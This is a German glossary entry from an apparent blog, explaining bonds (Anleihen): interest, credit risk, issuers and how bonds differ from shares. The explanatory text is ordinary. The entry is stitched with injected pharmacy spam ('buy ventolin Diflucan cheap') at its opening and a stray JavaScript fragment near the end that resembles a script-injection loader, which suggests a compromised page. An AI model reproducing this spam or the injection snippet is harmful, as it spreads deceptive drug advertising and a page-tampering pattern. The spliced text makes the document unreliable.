Anleihe

buy ventolin Diflucan cheap purchase Fluconazole Bei einer Anleihe handelt es sich um ein verzinsliches Wertpapier. Anleihen dienen Unternehmungen klassischerweise dazu sich Fremdkapital zu beschaffen. Wer eine Anleihe kauft, hat Anspruch auf die Rückzahlung des Kapitals und die Zahlung von Zinsen. In der Regel werden Anleihen auch Schuldverschreibungen genannt. Als Käufer einer Anleihe gibt man dem Unternehmen quasi einen Kredit und bekommt dafür eine Verzinsung des zur Verfügung gestellten Kapitals. So profitieren beide Seiten. Das Unternehmen bekommt Kapital, um wirtschaften zu können und der Inhaber der Schuldverschreibung erhält für die Bereitstellung des Kapitals Zinsen. Allerdings hängt die Sicherheit einer Anleihe stark von der Bonität des Herausgebers ab.

Anleihen sind demnach Wertpapiere, die wie Aktien an der Börse gehandelt werden können. Sie werden anders als Kredite öffentlich vergeben und können in der Regel von jedem Käufer erworben werden. Im Unterschied zur Aktie, die ebenfalls öffentlich gehandelt wird, wird man mit dem Kauf einer Anleihe nicht zum Miteigentümer eines Unternehmens, sondern fungiert quasi als Gläubiger. Je nachdem in welche Anleihe man investiert, geht man wie bei Wertpapieren üblich ein gewisses Risiko ein. Bundesanleihen gelten gemeinhin als sehr sichere Geldanlage, da es sich beim Herausgeber um die Bundesrepublik Deutschland handelt. Anleihen unterscheiden sich zudem hinsichtlich der Laufzeit, der Verzinsung und der Währung, zu der sie erworben werden.

Anleihen können von der öffentlichen Hand wie der Bundesrepublik Deutschland ausgegeben werden. Hier kann man Bundes- und Länderanleihen erwerben. Auch Banken und Wirtschaftsunternehmen können Anleihen emittieren. In einer Anleihe werden zudem die Gläubigerrechte verbrieft. Das heißt, man kennt als Käufer einer Anleihe normalerweise die Länge der Laufzeit, sowie die Höhe der Verzinsung. Bei jedem Finanzprodukt empfiehlt sich eine genaue Prüfung der Konditionen bevor man eine Anlageentscheidung fällt. if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.